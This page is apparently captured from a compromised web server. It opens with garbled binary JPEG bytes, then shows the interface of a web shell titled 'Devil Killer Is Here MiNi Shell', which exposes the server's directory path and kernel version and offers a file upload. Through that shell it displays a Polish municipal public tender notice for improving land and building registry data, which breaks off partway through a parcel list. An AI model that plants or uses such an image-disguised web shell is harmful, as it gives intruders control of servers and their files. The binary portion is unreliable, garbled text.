JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220314/0008482401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Podniesienie jakości danych ewidencji gruntów i budynków. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Piekary Śląskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276255418</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bytomska 84</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piekary Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-940</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@piekary.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://piekary.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Podniesienie jakości danych ewidencji gruntów i budynków. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5ab7e327-a37e-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00084824</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00323109/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Bieżąca aktualizacja ewidencji gruntów, podniesienie jakości danych, aktualizacja użytków</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl/tender/18781/summary <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Z zastrzeżeniem postanowień zawartych w ust. 2 i w ust. 4 niniejszego rozdziału SWZ, komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz.U. z 2020 r. poz. 344), tj:<br/>1)	poprzez Platformę przetargową pod adresem:<br/>https://josephine.proebiz.com/pl/ (zwanej dalej zamiennie Platformą przetargową), w wierszu oznaczonym tytułem oraz znakiem niniejszego postępowania<br/>	lub<br/>2)	pocztą elektroniczną na adres e-mail Zamawiającego: bzp@piekary.pl oraz adresy e mail Wykonawców podane w formularzach ofertowych. Po otwarciu ofert kontakt przez adres e-mail będzie możliwy tylko poprzez adres(adresy) wskazany w formularzu ofertowym.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową) – zobowiązany jest zapoznać się z instrukcjami użytkowników Platformy przetargowej - dostępnymi pod adresem https://josephine.proebiz.com/pl/ oraz zaakceptować regulamin korzystania z Platformy przetargowej.<br/><br/>2. Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu, o którym mowa w ust. 1 niniejszego rozdziału SWZ.<br/><br/>3. Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie internetowej Platformy przetargowej - pod adresem:<br/>https://josephine.proebiz.com/pl/<br/><br/>4. Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj. PROEBIZ s.r.o., Masarykovo náměstí 52/33, CZ - 702 00 Ostrava - Moravská Ostrava, C.9176, nr tel. +48 222 139 900, e-mail: houston@proebiz.com od poniedziałku do piątku (dni robocze) w godz. 8.00 – 16.00.<br/><br/>5. Sposoby złożenia oferty za pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia oferty, zostały opisane w Instrukcjach użytkowników Platformy przetargowej.<br/>6. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy, zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2020 r. poz. 346, 568, 695, 1517 i 2320), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/><br/>7. Zamawiający informuje, iż w przypadku przesyłania przez Wykonawcę dokumentów elektronicznych skompresowanych (w tym oferty przetargowej) dopuszczone są wyłącznie formaty danych wskazane w Rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. (t.j. Dz. U. z 2017 r., poz. 2247) w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. Powyższe oznacza, iż Zamawiający nie dopuszcza przysyłania dokumentów elektronicznych (w tym oferty) skompresowanych formatem .rar<br/><br/>8. Informacje, oświadczenia lub dokumenty, inne niż określone w ust. 6 niniejszego rozdziału SWZ, przekazywane w postępowaniu o udzielenie zamówienia, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej, wskazanych przez Zamawiającego w niniejszej SWZ.<br/><br/>9. W przypadku, gdy dokumenty elektroniczne w postępowaniu o udzielenie zamówienia, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku.<br/><br/>10. Podmiotowe środki dowodowe, przedmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informujemy, że zgodnie z art. 13 ust. 1 i ust. 2 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. (dalej RODO):<br/><br/>1.	Administratorem Pani/Pana danych jest Prezydent Miasta w Piekarach Śląskich z siedzibą przy ul. Bytomskiej 84, 41-940 Piekary Śląskie, tel.32/3939411, adres e-mail: um@piekary.pl.<br/>2.	Wyznaczony został Inspektor ochrony danych, z którym można się skontaktować w sprawie ochrony swoich danych pod adresem – e-mal: dane.osobowe@piekary.pl. lub pisemnie na adres siedziby Administratora wskazany powyżej.<br/>3.	Celem zbierania danych jest : prowadzenie procedury przetargowej, w wyniku której zostanie wybrany wykonawca, z którym zostanie zawarta umowa w sprawie zamówienia publicznego, zgodnie z art. 6 ust. 1 lit. c RODO, w związku z postanowieniami ustawy PZP z dnia 11 września 2019 r. (t. j. Dz. U. z 2021 r. poz. 1129 z późn. zm.).<br/>4.	Przysługuje Pani/Panu prawo dostępu do treści danych oraz ich sprostowania, żądania usunięcia lub ograniczenia przetwarzania, a także prawo sprzeciwu wobec przetwarzania.<br/>5.	Podanie danych jest obowiązkiem ustawowym i jest niezbędne do złożenia oferty w postępowaniu przetargowym.<br/>6.	Pani/Pana dane będą ujawniane i upubliczniane zgodnie z postanowieniami art. 18 ust. 1 oraz art. 253 ust. 1 ustawy PZP z dnia 11 września 2019 r., a ponadto udostępniane podmiotom i osobom upoważnionym na podstawie przepisów prawa, operatorowi pocztowemu, lub kurierowi w celu przekazania korespondencji papierowej, a także podmiotom przetwarzającym :<br/>- LTC spółka z o.o. z siedzibą przy ul. Pabianickiej 159/161, 93-490 Łódź, której powierzono dane w związku z asystą techniczną elektronicznego systemu obiegu dokumentów w Urzędzie Miasta Piekary Śląskie.<br/>7. Przysługuje Panu/Pani prawo wniesienia skargi do organu nadzorczego właściwego ds. ochrony danych osobowych – Prezesa Urzędu Ochrony Danych Osobowych, jeśli uzna Pani/Pan iż przepisy RODO zostały naruszone.<br/>8. Dane udostępnione przez Panią/Pana nie będą podlegały profilowaniu.<br/>9.	Administrator danych nie ma zamiaru przekazywać danych osobowych do państwa trzeciego lub organizacji międzynarodowej.<br/>10.	Dane osobowe będą przechowywane przez okres 5 lat - dokumentacja zamówień publicznych, 10 lat - umowy w sprawie zamówienia publicznego, zgodnie z postanowieniami Rozporządzenia Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (Dz. U. Nr 14, poz. 67 z późn. zm.). Okres przetwarzania może ulec zmianie ze względu na inne przepisy prawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271-14/GK/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 obejmuje 37 działek położonych w obrębach Kozłowa Góra, Piekary Wielkie oraz Brzozowice Kamień. Łączna liczba punktów załamania granic wynosi 412, budynki przechodzące na działkach: 247101_1.0001.AR_2-5.1232/123 i 247101_1.0003.AR_2-12BRZ.1187/25<br/><br/>1	247101_1.0001.AR_2-5.1232/123<br/>2	247101_1.0001.AR_3-2.1257/9<br/>3	247101_1.0001.AR_3-7.2036<br/>4	247101_1.0001.AR_3-7.221<br/>5	247101_1.0002.AR_13-5.186/56<br/>6	247101_1.0002.AR_13-5.195/62<br/>7	247101_1.0002.AR_14-3.867/47<br/>8	247101_1.0002.AR_14-4.895/23<br/>9	247101_1.0002.AR_15-2.526/6<br/>10	247101_1.0002.AR_2-4.1903/70<br/>11	247101_1.0002.AR_2-4.1904/70<br/>12	247101_1.0002.AR_2-5BRZ.760/13<br/>13	247101_1.0002.AR_2-8BRZ.1504<br/>14	247101_1.0002.AR_5-2BYT.2148/70<br/>15	247101_1.0002.AR_5-4BYT.2521/31<br/>16	247101_1.0002.AR_5-4BYT.2708/24<br/>17	247101_1.0002.AR_5-4BYT.2709/31<br/>18	247101_1.0002.AR_5-4BYT.3222/35<br/>19	247101_1.0002.AR_9-1.1806/205<br/>20	247101_1.0003.AR_1-14KAM.3932/360<br/>21	247101_1.0003.AR_1-14KAM.3973/360<br/>22	247101_1.0003.AR_1-1BRZ.1575/151<br/>23	247101_1.0003.AR_1-1BRZ.1788/99<br/>24	247101_1.0003.AR_1-2BRZ.1698/52<br/>25	247101_1.0003.AR_1-2BRZ.1700/52<br/>26	247101_1.0003.AR_1-2KAM.2021/382<br/>27	247101_1.0003.AR_1-3BRZ.1551/59<br/>28	247101_1.0003.AR_1-3BRZ.1938<br/>29	247101_1.0003.AR_1-5BRZ.1350/20<br/>30	247101_1.0003.AR_1-6KAM.4663<br/>31	247101_1.0003.AR_2-11BRZ.1186/25<br/>32	247101_1.0003.AR_2-12BRZ.1187/25<br/>33	247101_1.0003.AR_2-9BRZ.1520<br/>34	247101_1.0003.AR_2-9BRZ.430/20<br/>35	247101_1.0003.AR_2-9BRZ.916/20<br/>36	247101_1.0003.AR_1-6KAM.4700<br/>37	247101_1.0003.AR_1-2BRZ.1226/53<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w SWZ.<br/>VI. Wymagania w zakresie elektromobilności:<br/><br/>1. Zgodnie z art. 35 ust 2 pkt 1) i 68 ust. 3 ustawy z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych (Dz. U. z 2020 r. poz. 908 z późn. zm.) Zamawiający zleci wykonywanie zadania objętego niniejszym postępowaniem podmiotowy (Wykonawcy), którego udział pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym we flocie pojazdów użytkowanych przy wykonywaniu tego zadania (zamówienia publicznego) wynosić będzie od dnia 1 stycznia 2022 r. co najmniej 10%, a od dnia 1 stycznia 2025 r. co najmniej 30 %, z uwzględnieniem ewentualnych zmian powyższej ustawy, polegających na zmianie wielkości udziału pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym lub przesunięciu wskazanej w niej daty początkowej.<br/>2. Przy obliczaniu procentowego limitu pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym, o których mowa w pkt V.1) SWZ należy uwzględnić zaokrąglenie do pełnych jednostek (sztuk). <br/>3. Przez pojazdy elektryczne, o których mowa w pkt V.1) SWZ rozumie się pojazdy samochodowe w rozumieniu art. 2 pkt 33 ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (tj. pojazdy silnikowe, których konstrukcja umożliwia jazdę z prędkością przekraczającą 25 km/h z wyłączeniem ciągników rolniczych), wykorzystujące do napędu wyłącznie energię elektryczną akumulowaną przez podłączenie do zewnętrznego źródła zasilania.<br/>4. Przez pojazdy napędzane gazem ziemnym, o których mowa w pkt V.1) SWZ rozumie się pojazdy samochodowe w rozumieniu art. 2 pkt 33 ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (tj. pojazdy silnikowe, których konstrukcja umożliwia jazdę z prędkością przekraczającą 25 km/h z wyłączeniem ciągników rolniczych), wykorzystujące do napędu sprężony gaz ziemny (CNG) lub skroplony gaz ziemny (LNG), w tym pochodzący z biometanu.<br/><br/>VII. Rozwiązania równoważne<br/><br/>W przypadku zastosowania materiałów, urządzeń, wyrobów lub rozwiązań równoważnych, Wykonawca zobowiązany jest do ich wskazania w ofercie oraz złożenia wraz z ofertą kart technicznych lub innych dokumentów potwierdzających, że oferowanie rozwiązania równoważne spełniają wymagania Zamawiającego opisane w przedmiocie zamówienia.<br/>Jeżeli Wykonawca nie złożył ww. dokumentów lub złożone dokumenty będą niekompletne (nie potwierdzając w ten sposób równoważności oferty w zakresie opisanym w opisie przedmiotu zamówienia), Zamawiający nie będzie wzywał do ich złożenia/uzupełnienia. <br/><br/> VIII. Wymagania w zakresie dostępności dla wszystkich użytkowników i osób niepełnosprawnych<br/><br/>Na podstawie art. 100 u.p.z.p., Zamawiający adekwatnie do przedmiotu zamówienia zapewnia dostępność dla wszystkich użytkowników, w tym dla osób niepełnosprawnych i z uwzględnieniem tych wymagań sporządza opis niniejszego przedmiotu zamówienia. Przedmiot zamówienia nie obejmuje zakresu usług ingerujących w dostępność dla wszystkich użytkowników, w tym osób niepełnosprawnych, a także nie stawia takich wymogów szczególnych, ponad normy ogólne. Realizacja przedmiotu zamówienia nie stawia barier lub jakichkolwiek utrudnień w tym obszarze przestrzeni publicznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71355000-1 - Usługi pomiarowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72320000-4 - Usługi bazy danych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">I Kryterium - cena (C) waga 60% <br/>II Kryterium - gwarancja na przedmiot umowy (G) waga 40%<br/> <br/>3. Ocena ofert w oparciu o powyższe kryteria dokonana zostanie w następujący sposób:<br/><br/>Kryterium I - cena (C) - waga 60%<br/><br/>C = (cena najniższa spośród wszystkich ofert/cena badanej oferty) x 100 punktów x 60%<br/><br/>Kryterium II – gwarancja na przedmiot umowy (G) – waga 40 %<br/><br/>Zamawiający przyzna wykonawcy punkty za zadeklarowany w formularzu oferty okres gwarancji (maksymalnie 40 punktów); w przypadku braku wpisania w formularzu oferty gwarancji na przedmiot umowy, Zamawiający przyzna w tym kryterium „0” punktów i Wykonawca będzie zobowiązany do gwarancji minimalnej tj. 12 miesięcy.<br/><br/>- 12 miesięcy – 0 pkt.<br/>– 24 miesiące – 20 pkt <br/>– 36 miesięcy – 40pkt <br/><br/>G = (ilość punktów badanej oferty za gwarancję / największa ilość punktów za gwarancję tj. 40) x 100 punktów x 40%<br/><br/><br/>Łączna ocena punktowa będzie stanowić sumę uzyskanych przez wykonawcę punktów we wszystkich kryteriach = (C) + (G)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja na przedmiot umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 obejmuje 57 działek położonych w obrębach Brzeziny Śląskie i Dąbrówka Wielka. Łączna liczba punktów załamania granic wynosi 412, budynki przechodzące na działkach: 247101_1.0004.AR_1-5DĄBR.648/48 i 247101_1.0004.AR_2-10DĄBR.189 oraz budynek położony na działce: 247101_1.0005.AR_2-5.1143/71 (bunkier)<br/><br/>1	247101_1.0004.AR_1-23KAM.2769/358<br/>2	247101_1.0004.AR_1-23KAM.2771/358<br/>3	247101_1.0004.AR_1-27KAM.2992/364<br/>4	247101_1.0004.AR_1-2DĄBR.976<br/>5	247101_1.0004.AR_1-4DĄBR.623/88<br/>6	247101_1.0004.AR_1-4DĄBR.644/74<br/>7	247101_1.0004.AR_1-4DĄBR.686/96<br/>8	247101_1.0004.AR_1-5DĄBR.252/28<br/>9	247101_1.0004.AR_1-5DĄBR.255/23<br/>10	247101_1.0004.AR_1-5DĄBR.257/22<br/>11	247101_1.0004.AR_1-5DĄBR.619/46<br/>12	247101_1.0004.AR_1-5DĄBR.633/60<br/>13	247101_1.0004.AR_1-5DĄBR.636/58<br/>14	247101_1.0004.AR_1-5DĄBR.648/48<br/>15	247101_1.0004.AR_1-5DĄBR.650/39<br/>16	247101_1.0004.AR_1-5DĄBR.665/29<br/>17	247101_1.0004.AR_1-5DĄBR.685/96<br/>18	247101_1.0004.AR_1-5DĄBR.715/58<br/>19	247101_1.0004.AR_1MICH.105/12<br/>20	247101_1.0004.AR_1MICH.205/3<br/>21	247101_1.0004.AR_1MICH.259/3<br/>22	247101_1.0004.AR_1MICH.261/3<br/>23	247101_1.0004.AR_1MICH.262/3<br/>24	247101_1.0004.AR_1ROZB.3241/433<br/>25	247101_1.0004.AR_1ROZB.3243/433<br/>26	